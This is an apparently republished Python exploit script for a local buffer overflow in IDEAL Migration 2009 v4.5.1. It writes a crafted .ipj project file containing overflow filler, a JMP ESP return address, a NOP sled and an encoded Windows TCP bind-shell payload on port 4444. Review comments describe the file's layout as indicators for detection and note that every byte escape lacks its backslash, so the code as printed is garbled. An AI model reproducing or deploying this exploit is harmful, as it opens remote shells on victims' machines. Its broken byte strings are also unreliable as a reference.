
# Title : IDEAL Migration 2009 v4.5.1 Local Buffer Overflow Exploit
# Published : 2010-04-26
# Author : Dr_IDE


#!/usr/bin/env python

#################################################################
#
# IDEAL Migration 2009 v4.5.1 Local Buffer Overflow Exploit
# Found By:		Dr_IDE
# Usage:		Right Click First Element in tree -> Open Migration Project -> Bind Shell
# Download:		www.pointdev.com
# Tested On:	Windows XPSP3
#
#################################################################

# windows/shell_bind_tcp - 696 bytes  Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444
#
# Payload blob that is appended after the return address and the NOP sled
# in the write() call below. The two lines above are the payload
# generator's own description (a TCP bind shell on port 4444); nothing in
# this script parses, validates or measures these bytes.
#
# NOTE(review): in this copy every escape appears as a bare "xNN" with no
# backslash, so as written each string is literal ASCII text rather than
# the intended byte values - presumably an extraction artifact. Any byte
# count or offset derived from this listing should be verified against the
# original before being relied on (e.g. for a detection signature).
sc = (
"x89xe2xdbxccxd9x72xf4x5fx57x59x49x49x49x49x49"
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a"
"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32"
"x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49"
"x4bx4cx42x4ax4ax4bx50x4dx4bx58x4bx49x4bx4fx4b"
"x4fx4bx4fx43x50x4cx4bx42x4cx51x34x46x44x4cx4b"
"x50x45x47x4cx4cx4bx43x4cx43x35x44x38x43x31x4a"
"x4fx4cx4bx50x4fx42x38x4cx4bx51x4fx51x30x45x51"
"x4ax4bx50x49x4cx4bx47x44x4cx4bx45x51x4ax4ex50"
"x31x49x50x4ax39x4ex4cx4bx34x49x50x44x34x43x37"
"x49x51x49x5ax44x4dx45x51x48x42x4ax4bx4cx34x47"
"x4bx50x54x46x44x46x48x44x35x4bx55x4cx4bx51x4f"
"x46x44x43x31x4ax4bx43x56x4cx4bx44x4cx50x4bx4c"
"x4bx51x4fx45x4cx43x31x4ax4bx44x43x46x4cx4cx4b"
"x4dx59x42x4cx47x54x45x4cx43x51x49x53x50x31x49"
"x4bx43x54x4cx4bx47x33x46x50x4cx4bx47x30x44x4c"
"x4cx4bx42x50x45x4cx4ex4dx4cx4bx47x30x43x38x51"
"x4ex45x38x4cx4ex50x4ex44x4ex4ax4cx46x30x4bx4f"
"x4ex36x45x36x46x33x43x56x45x38x47x43x46x52x42"
"x48x43x47x42x53x46x52x51x4fx50x54x4bx4fx48x50"
"x42x48x48x4bx4ax4dx4bx4cx47x4bx46x30x4bx4fx48"
"x56x51x4fx4dx59x4bx55x45x36x4bx31x4ax4dx43x38"
"x45x52x46x35x43x5ax45x52x4bx4fx48x50x45x38x49"
"x49x44x49x4ax55x4ex4dx51x47x4bx4fx48x56x51x43"
"x51x43x51x43x51x43x46x33x51x53x50x53x47x33x51"
"x43x4bx4fx4ex30x42x46x43x58x42x31x51x4cx45x36"
"x46x33x4bx39x4dx31x4cx55x45x38x4ex44x44x5ax42"
"x50x49x57x50x57x4bx4fx49x46x42x4ax44x50x50x51"
"x50x55x4bx4fx48x50x45x38x49x34x4ex4dx46x4ex4a"
"x49x46x37x4bx4fx4ex36x50x53x46x35x4bx4fx48x50"
"x43x58x4bx55x47x39x4cx46x50x49x46x37x4bx4fx48"
"x56x46x30x50x54x50x54x46x35x4bx4fx4ex30x4cx53"
"x42x48x4bx57x44x39x48x46x44x39x50x57x4bx4fx48"
"x56x51x45x4bx4fx4ex30x42x46x43x5ax42x44x42x46"
"x43x58x43x53x42x4dx4cx49x4bx55x43x5ax46x30x51"
"x49x51x39x48x4cx4dx59x4dx37x42x4ax51x54x4bx39"
"x4ax42x50x31x49x50x4ax53x4ex4ax4bx4ex50x42x46"
"x4dx4bx4ex50x42x46x4cx4ax33x4cx4dx43x4ax47x48"
"x4ex4bx4ex4bx4ex4bx45x38x42x52x4bx4ex4ex53x42"
"x36x4bx4fx42x55x47x34x4bx4fx49x46x51x4bx50x57"
"x51x42x50x51x46x31x50x51x43x5ax43x31x50x51x50"
"x51x51x45x50x51x4bx4fx48x50x42x48x4ex4dx48x59"
"x45x55x48x4ex50x53x4bx4fx49x46x42x4ax4bx4fx4b"
"x4fx47x47x4bx4fx4ex30x4cx4bx51x47x4bx4cx4bx33"
"x48x44x45x34x4bx4fx49x46x50x52x4bx4fx4ex30x45"
"x38x4ax50x4dx5ax43x34x51x4fx51x43x4bx4fx4ex36"
"x4bx4fx4ex30x41x41")

# Skeleton of the malicious .ipj migration project file. The hex values
# decode to plain text, which is what a file-level detection should key on:
#   head: CRLF + "[Group,Export,Yes]" + CRLF           (section header)
#   buff: "Computer=" followed by 2420 x 'A' (0x41)    (overflow filler)
#   retn: 4 bytes that land on the saved return address; the comment
#         says JMP ESP and the header pins it to Windows XP SP3 only
#   nops: 16 x 0x90 between the return address and the payload
#   foot: CRLF + "[End]" + CRLF                         (file trailer)
# A "Computer=" value of this length is far beyond any valid hostname; the
# long run of a single repeated byte right after the key is the simplest
# indicator for scanning .ipj files.
head = ("x0Dx0Ax5Bx47x72x6Fx75x70x2Cx45x78x70x6F"
"x72x74x2Cx59x65x73x5Dx0Dx0A");							# Project Header
buff = ("x43x6fx6dx70x75x74x65x72x3D"  + "x41" * 2420);	# XPSP3 EIP Overwrite
foot = ("x0Dx0Ax5Bx45x6Ex64x5Dx0Dx0A");					# File Footer
retn = ("x2Fx1DxF3x77");										# JMP ESP
nops = ("x90" * 16);

# Writes the crafted file into the current working directory and exits.
# The script itself performs no other action; the overflow only happens
# when the target application opens the file (see Usage in the header).
try:
	print "[*] Generating Evil Migrate File..."
	# NOTE(review): the output name says 2010 while the title says
	# Migration 2009 - possibly carried over from the author's previous
	# exploit; the application's accepted extension is what matters.
	f1 = open("unIDEAL2010.ipj","w");
	# Layout: header, filler, return address, NOP sled, payload, trailer.
	f1.write(head + buff + retn + nops + sc + foot);
	f1.close();
	print "[*] File created successfully!"

# Bare except: every failure (permissions, disk full, even KeyboardInterrupt)
# is reported as a generic write problem and the original exception is lost.
except:
	print "[-] There was a problem writing the file."



#[pocoftheday.blogspot.com]